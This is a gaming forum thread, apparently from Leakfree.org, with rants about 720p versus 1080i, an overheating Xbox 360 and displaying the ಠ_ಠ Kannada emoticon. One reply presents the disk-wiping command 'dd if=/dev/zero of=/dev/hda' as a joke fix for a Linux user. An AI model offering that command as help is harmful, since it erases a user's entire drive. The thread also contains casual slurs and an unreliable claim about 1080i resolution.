THE RAGE TOPIC

In a nutshell, 720p is better because the image is crisper, where the 1080i image is blurry. Plus 60 Hz vs 30 Hz.

1080i is not only interlaced, but also it’s only 1366x768 (and not 1920x1080)

Just now in Forza 3- took an Alpha around an eight mile race and won first in style. Saved a replay, went back to shoot some screens in the screenshot maker. Then the fucking console overheats and likely loses my progress.

FFFFFFUUUUUUUUUUUUUUUUUUUUU

360 S is too worth the money. Almost inaudible white noise if kept horizontal, not built to cook itself from the inside out, and you can slam any old HDD in the back and it’ll recognize

By comparison, the PS3 is cool as a cucumber whenever I run the damn thing. Wtf.

Why doesn’t Mac support “kannada”? Just realised today that the “OC, AQ” square I kept seeing on these forums was actually the kannada letter used for the look of disapproval. Had to download a font file.

Emoticons formed with kannada script are too gay. Yes, even for Macs.

Also, my Mac supports it by default ಠ_ಠ

ಠ_ಠ

It’s made up of two of the same letter with an underscore in the middle of it. And that’s not how they’re used in the language ಠ_ಠ .

lol, for a moment i thought you meant the game RAGE, and i was like ಠ_ಠ

I know what it made of, I just kept seeing a square with letters instead of “ಠ”

I just checked with my iPhone, it can also do ಠ_ಠ.

You must being doing something wrong, Fergus. I bet yo have one of them nasty Mac viruseseses.

i can’t see it on my linux…

saw it on linux before though, probably just need to enable a locale :stuck_out_tongue:

Linux you say?

[COLOR=‘Black’]dd if=/dev/zero of=/dev/hda bs=1M

Don’t blame me for any blank HDDs that result from this.

About a year ago I would have agreed with you.

Want to know another fun story? My cousin developed the character Pepper in Lego Island.

Founded in 2004, Leakfree.org became one of the first online communities dedicated to Valve’s Source engine development. It is more famously known for the formation of Black Mesa: Source under the 'Leakfree Modification Team' handle in September 2004.
